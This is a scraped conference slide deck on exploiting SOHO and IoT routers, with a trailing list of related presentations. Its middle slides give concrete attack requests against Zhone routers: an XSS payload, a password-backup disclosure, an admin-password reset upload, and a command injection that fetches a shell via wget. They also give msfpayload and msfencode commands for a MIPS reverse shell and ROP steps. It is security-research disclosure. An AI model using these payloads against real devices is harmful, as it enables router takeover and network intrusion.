advanced soho router exploitation
play

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r - PowerPoint PPT Presentation

Jun 23, 2023 •366 likes •846 views

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r www.vantagepoint.sg | office@vantagepoint.sg Hi everyone my name is Lyon Yang I hack IoT and embedded systems. I live in sunny Singapore. Spoke @

  1. Advanced SOHO Router Exploitation Lyon ¡Yang ¡/ ¡@l0Op3r ¡ ¡ ¡ www.vantagepoint.sg | office@vantagepoint.sg

  2. • Hi everyone my name is Lyon Yang • I hack IoT and embedded systems. • I live in sunny Singapore. • Spoke @ DEFCON IoT Village, HITB, XCON, RUXCON • Winner of DEFCON23 SOHOpelessly Broken Track 0 Contest • Singapore is a smart city with IoT already deployed. • Taxi drivers in SG will become robots. • I work at a company called Vantage Point • Strongest technical team in Singapore/SE Asia. • Large collective of passionate hackers. • Working in the financial and government sectors. 1

  3. Today I want to share with you a story: 1 year ago, I set about to try and become the “corelan” of ARM and MIPS exploitation - a formidable task! I wanted to fully understand embedded systems and try to contribute back into the community. and in the process pop many shells! 2

  4. Who Am I ? I am a rather regular guy… • Basic understanding of ASM and exploitation • Attended some training events myself • Corelan, HITB, OSCP Practice Makes Perfect • I started buying embedded devices and ‘playing’ • Working on IoT till 2-3am most mornings. 3

  5. Immature The current state of embedded hacking Rather immature. § I learnt quickly that tools don’t work. § A lot of things crash.. § Support that was supported, isn’t actually supported. § Answers on StackOverflow are very limited… 4

  6. 1990s The state of IoT and embedded security. Equally as immature as the tools. • “1990 called” - Send our bugs back • Basic strcpy/memcpy exploits • Not much privilege separation • Unsecured host OS • Backdoors are often ‘vendor features’ • Not all vendors care about security 5

  7. Attack Surface Attack Surface of IoT • Think of IoT devices as miniature computers • ARM or MIPS CPU • “Hard-Drive” is a memory IC • Runs Linux (typically) • Communicate over WiFi/Wired • HTTPD, UnPnP, FTPD, SSHD, TelnetD 6

  8. Hardware Hardware Attacks: • Image the IoT device as soon as possible • This involves dumping the memory IC. Not a difficult task. • Few hundred $ of gear • Hot-Air Gun “Rework Station” • IC Pick Adapter (SOP 20) • IC Pick 7

  9. Dump Firmware Other alternatives • Firmware updates are often online • Can be unpacked using freely available tools (binwalk, fmk, squashfs) Once we have the Firmware – its digging time. • Identify all software on the device • Find all shared libraries (Look for custom ones) • Find each available Software Input / Entry Point It does not take long before your finding shells. 8

  10. At Vantage Point I work with IoT vendors within SE Asia Network Services (httpd/telnetd…) • Found more stack overflows than you can count • “Every string was insecurely handled” Admin “restricted” Shells command1 | sh sh dumpmem/readmem 9

  11. Bugs • Backdoor User(s) • Security Implemented in Client Side • Debug interfaces left active • File Upload -> Shell • Arbitrary File Read (../../../../) • Command Injection • Stack Overflows • Unauthorized Remote Access via UPnP 10

  12. In IoT we want R emote U nauthenticated bugs • Large scale device compromises. • Telnetd & httpd are first targets • Daemon re-spawn on crash • Lots of unauthenticated content • Both run as root • Remote access often allowed • Many fuzzing tools available • HTTP is a big protocol! 11

  13. Developers typically modify open source software • Customized to meet their own needs. • MicroHTTPD, BusyBox. • This requires you are a strong C, C++ Developer • Most developers now-a-days, are not so strong. • Customizations exactly where we find bugs. • Stack Overflows in vendor modifications • Additional File Handlers or HTTP Methods • Authentication • Password Reset • Log File Access 12

  14. Typically I find bugs like these: All hail the might of IoT Security 13

  15. ZHONE Zhone Technologies is a Global Leader in Fiber Access Transformation for Service Provider and Enterprise Networks! Based in the US Reference ¡from ¡ zhone.com ¡ 14

  16. Telcos using Zhone Routers Reference from Shodan 15

  17. Attacking your tech support Stored XSS POST /zhnsystemconfig.cgi? snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global %20Support &snmpSysLocation= www.zhone.com %3Cscript %3Ealert(1)%3C/script%3E &sessionKey=1853320716 HTTP/1.1 Host: 192.168.1.1 16

  18. Privilege Escalation CVE-2014-8356 Privilege Escalation via Javascript Controls Access Control via Javascript! (Horrible!) Direct Object Reference to administrative functions! 17

  19. Plaintext Passwords All username and passwords usually found in the backup settings file! CVE-2014-8537 – Exposed Plaintext Username & Passwords Passwords found to be BASE64 encoded in backup settings file. GET /backupsettings.conf?action=getConfig 18

  20. Privilege Escalation Again? POST /uploadsettings.cgi HTTP/1.1 Host: 192.168.1.1 -----------------------------75010019812050198961998600862 Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf <?xml version="1.0"?> <DslCpeConfig version="3.2"> … <AdminPassword></AdminPassword> … </DslCpeConfig> 5 -----------------------------75010019812050198961998600862— 19

  21. Command Injection (Telnetd) CVE-­‑2014-­‑9118 ¡ ¡Command ¡InjecEon ¡via ¡the ¡telnetd ¡session ¡ # ¡download-­‑sw ¡“Mp://123:213@213/;ls ¡-­‑la” ¡ 20

  22. Command Injection (HTTPD) Favourite way to look for Command Injection via IDA Pro: Search for keyword “ shell” in IDA PRO: Sample ¡Exploit: ¡ /zhnping.cmd? &test=traceroute&sessionKey=985703201&ipA ddr=192.168.1.1 |wget%20h5p:// 192.168.1.17/shell%20-­‑O%20/tmp/ shell &Zl=30&wait=3&queries=3 ¡ 21

  23. \x41\x41\x41\x41 Stack Overflow #1: GET /.htmlAAAAA…(7000 ‘A’)…AAAA.html Stack Overflow #2: POST /.tst HTTP/1.1 Host: 192.168.1.1 AAAA…..AAAA (7000 Characters) 22

  24. Stack Executable Stack ¡commonly ¡found ¡to ¡be ¡executable ¡ 23

  25. Cache Incoherency Reference: ¡ hZp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‑and-­‑self-­‑modifying-­‑code ¡ 24

  26. MIPS Cache Incoherency First two ROP Gadgets à Call the sleep function from libc library to flush the MIPS Data Cache. For that we need two ROP Gadgets 1. Setup value 1 in $a0 25

  27. 2 nd ROP Gadget 2. Call libc sleep function 26

  28. Bypass ASLR Last two ROP Gadgets: • Copy address of stack • jump to stack to execute shellcode 27

  29. ROP Gadgets Commonly Craig Heffner IDA Script works best for looking for ROP Gadgets: https://github.com/devttys0/ida/tree/master/plugins/mipsrop Example: 28

  30. Excited to POP Shell! 29

  31. Generate Shellcode Generate Shellcode: msfpayload linux/mipsbe/shell_reverse_tcp lport=31337 lhost=192.168.1.177 R Bad Characters Problem! : 0x20 0x00 0x3a 0x0a 0x3f Encode Shellcode: msfencode -e mipsbe/longxor -b '0x20 0x00 0x3a 0x0a 0x3f' -t c 30

  32. No Shell?? No Shell!? Traced through GDB Debugger 1. ROP Gadgets worked fine 2. Shellcode decodes correctly 31

  33. Bad Characters 32

  34. MIPS Encoder Simplified ¡version ¡of ¡encoder ¡ 33

  35. Shell Died Instantly?! 34

  36. Problem Router constantly monitors all critical services Kills and re-spawns services if not functioning SoluEon: ¡ Fork ¡the ¡shellcode ¡ 35

  37. MIPS Exploit Writing Clear Cache à Sleep() ASLR à Use ROP Gadget to jump to Stack Bad Characters à Wrote your own encoder Auto-Respawn Process Monitoring à Fork the Shellcode Process 36

  38. Exploit 37

  39. 0-Day Demo DEMO If ¡Eme ¡permits ¡we’ll ¡learn ¡briefly ¡how ¡to ¡write ¡ the ¡0-­‑Day ¡MIPS ¡Exploit ¡later! ¡ 38

  40. Cache Incoherency • Self-modifying code (Encoder/Decoder) would commonly cause Cache Incoherency • Instructions stored in Instruction Cache will execute instead of Data Cache • Modified Shellcode is stored in Data Cache and will not execute Reference: ¡ hZp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‑and-­‑self-­‑modifying-­‑code ¡ ¡ 39

  41. Cache Incoherency (ARM) • Encode and decode only the data portion of the shellcode. Data is not considered as Instructions! 40

  42. Decoding Data InstrucEon ¡Cache ¡ Data ¡Cache ¡ Decoder ¡ Decode ¡ Shellcode ¡ (InstrucEons) ¡ Shellcode ¡ Shellcode ¡ Read ¡Data ¡ (Encoded ¡Data) ¡ (Decoded ¡Data) ¡ 41

  43. ARMEncoder ARMCoder (Alpha Stage) • Mthumb encoder (Encodes all or part of your ARM Shellcodes) • Provides you with an encoder • Objdump your shellcode binary to specific formats like C: "\x41\x42\x43\x44” Upcoming features • Detects for bad characters • 32bit encoder • Generates Shellcode • Accept other forms of shellcode input. (Currently only supports reading from binary) • Added support for MIPS Architecture Download Link: https://github.com/l0Op3r/ARMCoder 42

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro Folgado Rueda Independent Researcher Jos Antonio Rodrguez Garca Independent Researcher Ivn Sanz de Castro Security Analyst at Wise Security

1.03k views • 72 slides
SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS A STUDY OF LIGHTWEIGHT A STUDY OF LIGHTWEIGH T CONCRET CONCRETE CO CONSTRUCTION NSTRUCTION JOSEPH MUGFORD

687 views • 34 slides
A Wormhole Router Design progress report Wei Song 30/07/2009 Advanced Processor Technology

A Wormhole Router Design progress report Wei Song 30/07/2009 Advanced Processor Technology

A Wormhole Router Design progress report Wei Song 30/07/2009 Advanced Processor Technology Group 2014/5/13 The School of Computer Science Content Motive and Plans Wormhole router Channel Slicing, motivation Lookahead, critical

451 views • 29 slides
KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the existing Victorian style architecture surroundings offers a charming and trendy atmosphere that is unique and beloved by many. King West has been

326 views • 3 slides
Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms Tr Transaction Overview Pr Pro F Forma Ca Capitalisation PureGym completed the acquisition of Soho Gyms on 22 Capital Capi alisat ation

292 views • 4 slides
CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC CNC stands for Computer Numeric Controlled (Router) Very Expensive Can only be used with proper training Trumans favorite

534 views • 7 slides
Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680 Market Opportunity SOHO (Small Office / Home Office) Market Opportunity 12,717 businesses have &gt;500 employees 556,988 businesses have 20

120 views • 11 slides
them all A story of cross-software ownage, shared codebases and advanced exploitation. Mateusz

them all A story of cross-software ownage, shared codebases and advanced exploitation. Mateusz

One font vulnerability to rule them all A story of cross-software ownage, shared codebases and advanced exploitation. Mateusz j00ru Jurczyk REcon 2015, Montreal PS&gt; whoami Project Zero @ Google Low-level security researcher

2.33k views • 187 slides
The Simulation of the Dynamic Link Allocation Router (DyLAR) Wei Song Advanced Processor

The Simulation of the Dynamic Link Allocation Router (DyLAR) Wei Song Advanced Processor

The Simulation of the Dynamic Link Allocation Router (DyLAR) Wei Song Advanced Processor Technology Group 2014/5/13 The School of Computer Science Overview A brief review of the Dynamic Link Allocation flow control method The new

499 views • 33 slides
FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron Steinfeld Clayton School of IT Monash University April 2015 Ron Steinfeld FIT5124 Advanced Topics in SecurityHacking Techniques III Web Browser

2.56k views • 17 slides
! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented Exploitation ! Techniques ! Demo ! Mac OS X x86_64 ! Conclusion ! Morris Worm (November 1988) ! Exploited a stack buffer overflow in BSD in.fingerd on VAX

1.02k views • 80 slides
Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15 Rev. 1 http://www.eunil.com PCB Router / Depanel machine : Off-Line ETR-400 This machine is used to separate the main panel PCB and the arrayed

131 views • 9 slides
CS244 Advanced Topics in Networking Lecture 10: Buffer Sizing Nick McKeown Sizing Router

CS244 Advanced Topics in Networking Lecture 10: Buffer Sizing Nick McKeown Sizing Router

CS244 Advanced Topics in Networking Lecture 10: Buffer Sizing Nick McKeown Sizing Router Buffers [Appenzeller, et al. 2004] Spring 2020 Context Guido Appenzeller At the time: CS PhD student Founded Big Switch Networks CTO

880 views • 40 slides
BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb olivier@cochard.me Agenda Why a x86 software router ? Project Targets NanoBSD: FreeBSD for appliance BSDRP feature list

561 views • 32 slides
Advanced MySQL Exploitation Muhaimin Dzulfakar Blackhat U.S.A 2009 Las Vegas 1 Who am I

Advanced MySQL Exploitation Muhaimin Dzulfakar Blackhat U.S.A 2009 Las Vegas 1 Who am I

Advanced MySQL Exploitation Muhaimin Dzulfakar Blackhat U.S.A 2009 Las Vegas 1 Who am I Muhaimin Dzulfakar Security Consultant Security-Assessment.com 2 SQL Injection An attack technique used to exploit web sites that

678 views • 20 slides
Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for Provider-Independent Addressing 300 K number of number of r routing ta outing table entries ble entries 250 K 200 K 150 K 100 K Geoff Huston: CIDR Report 50 K

171 views • 15 slides
Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008

Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008

Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008 Felix tmbinc Domke &lt;tmbinc@elitedvb.net&gt; True 64bit architecture 3 Dual-Thread cores, 3.2 Ghz each GB RAM Fast DVD-drive o

668 views • 41 slides
Dismantling droids for breakfast - The current state of app reverse engineering Siegfried

Dismantling droids for breakfast - The current state of app reverse engineering Siegfried

Dismantling droids for breakfast - The current state of app reverse engineering Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP #whoami 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr.

458 views • 22 slides
HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection thr Obfuscation) Circuit modification techniques designed to conceal or lock the functionality and/or circuit structure The modifications are designed

157 views • 11 slides
Traditional Commercial Software Development Open Source Development Producing consumer-oriented

Traditional Commercial Software Development Open Source Development Producing consumer-oriented

Traditional Commercial Software Development Open Source Development Producing consumer-oriented software is often done in much the same way as for tangible mass-produced Dr. James A. Bednar products, such as furniture or cars. E.g., a company:

526 views • 5 slides
Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015 www.realworldcrypto.com/rwc2015 #realworldcrypto Welcoming Remarks Fire safety Lightning talks

338 views • 8 slides
Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview

Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview

Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview Capital Values $ $

584 views • 19 slides
ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun?

ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun?

ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun? NNOUNCEMENTS What is the Sun made of? FIRST MIDTERM THIS THURSDAY, 09/17 How does the Sun produce its energy? ex observing night Tue

271 views • 8 slides
Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This

Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This

Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This talk Introduction Economic aspects Why make secure products? Trust in embedded devices Verifying trust Conclusion Aurlien

649 views • 37 slides

More recommend